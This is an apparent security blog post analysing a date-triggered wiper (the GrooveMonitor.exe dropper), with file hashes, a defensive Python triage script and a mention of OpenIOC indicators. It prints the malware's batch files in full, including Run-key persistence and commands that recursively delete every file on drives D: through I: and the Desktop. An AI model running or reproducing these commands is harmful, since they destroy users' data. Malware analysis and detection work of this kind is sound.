A few days ago, the Iranian CERT (Maher Center) released information about a newly identified targeted malware with wiping capabilities. The code is very simple: it deletes files on several drives on a set of hard-coded dates.
The original dropper is a self-extracting RAR file with the name GrooveMonitor.exe. Once executed it extracts the following files:
WINDOWS\system32\SLEEP.EXE, md5: ea7ed6b50a9f7b31caeea372a327bd37
WINDOWS\system32\jucheck.exe, md5: c4cd216112cbc5b8c046934843c579f6
WINDOWS\system32\juboot.exe, md5: fa0b300e671f73b3b0f7f415ccbe9d41
juboot.exe is then executed. It creates and runs the following bat file:
Documents and Settings\%User%\Local Settings\Temp\.tmp\juboot.bat
@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
start "" /D"%systemroot%\system32\" "jucheck.exe"
As you can see, the bat file uses reg.exe to create a value under the HKCU Run key, which the malware uses to maintain persistence by executing jucheck.exe every time the user logs on.
Then jucheck.exe is executed, which creates the file Documents and Settings\Administrator\Local Settings\Temp\.tmp\jucheck.bat:
@echo off & setlocal
sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes
if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes
if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes
if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes
if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes
if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes
if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes
if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes
if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no
:yes
sleep for 3000
IF EXIST d: del "d:\*.*" /q /s /f
IF EXIST d: Chkdsk d:
IF EXIST e: del "e:\*.*" /q /s /f
IF EXIST e: Chkdsk e:
IF EXIST f: del "f:\*.*" /q /s /f
IF EXIST f: Chkdsk f:
IF EXIST g: del "g:\*.*" /q /s /f
IF EXIST g: Chkdsk g:
IF EXIST h: del "h:\*.*" /q /s /f
IF EXIST h: Chkdsk h:
IF EXIST i: del "i:\*.*" /q /s /f
IF EXIST i: Chkdsk i:
del "%userprofile%\Desktop\*.*" /q /s /f
start calc
:no
As you can see, when this bat file is executed it first deletes juboot.exe and the GrooveMonitor.exe executable that resides in the Start Menu Startup folder, removing the dropper's traces. Then the bat file compares the system date (the %date% string) against the list of predefined dates, and if one matches it jumps to the wiping routine. This routine checks whether each of the drives D: through I: exists and, for every drive present, recursively deletes every file on it and runs Chkdsk. Finally it deletes the contents of the user profile's Desktop folder and launches calc.exe.
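For triage, the three behaviours described above (Run-key persistence, hard-coded %date% triggers and recursive deletes of drive roots and profile folders) can be pulled out of a batch file automatically. The script below is an added example written for this post, not part of the original analysis or the malware; the embedded SAMPLE_BAT is a constructed excerpt modelled on the jucheck.bat listing, and the function names are my own.

```python
import re
from datetime import datetime

# Constructed excerpt modelled on the jucheck.bat listing above; it is not the
# malware's actual file, just enough lines to exercise the checks below.
SAMPLE_BAT = r'''@echo off & setlocal
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes
goto no
:yes
IF EXIST d: del "d:\*.*" /q /s /f
del "%userprofile%\Desktop\*.*" /q /s /f
:no
'''

DATE_TRIGGER = re.compile(r'if\s+"%date%"=="(\w{3}) (\d{2}/\d{2}/\d{4})"\s+goto', re.I)
RUN_KEY = re.compile(r'^\s*reg\s+add\s+\S*\\CurrentVersion\\Run\b', re.I | re.M)
RECURSIVE_DEL = re.compile(r'\bdel\s+"([^"]+)"((?:\s+/[a-z])+)', re.I)


def triage(bat_text: str) -> dict:
    """Summarise Run-key persistence, hard-coded %date% triggers and
    recursive deletes (del ... /s) found in a batch script."""
    triggers = []
    for weekday, mdy in DATE_TRIGGER.findall(bat_text):
        parsed = datetime.strptime(mdy, "%m/%d/%Y")
        triggers.append({
            "literal": f"{weekday} {mdy}",
            "iso": parsed.date().isoformat(),
            # %date% carries the weekday on US-locale hosts; a trigger whose
            # weekday does not match its date could never fire.
            "weekday_ok": parsed.strftime("%a").lower() == weekday.lower(),
        })
    wipes = [target for target, flags in RECURSIVE_DEL.findall(bat_text)
             if "/s" in flags.lower()]
    return {
        "run_key_persistence": RUN_KEY.search(bat_text) is not None,
        "triggers": triggers,
        "recursive_wipe_targets": wipes,
    }


def trigger_fires(bat_text: str, host_date_value: str) -> bool:
    """Emulate the script's own test: %date% must equal a trigger string exactly,
    so a host whose short-date format omits the weekday (e.g. '12/10/2012') or
    orders the fields differently never reaches the :yes label."""
    return any(t["literal"] == host_date_value for t in triage(bat_text)["triggers"])


if __name__ == "__main__":
    print(triage(SAMPLE_BAT))
```

The exact-string comparison is worth noting for incident scoping: the wiper only fires on hosts whose %date% output is in the "ddd MM/dd/yyyy" form the author assumed.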
We don't have details about the infection vector, but given the nature of the dropper it could be deployed via USB drives, internal actors, spear phishing, or as the second stage of a targeted intrusion.
We have built some OpenIOC indicators that you can access here.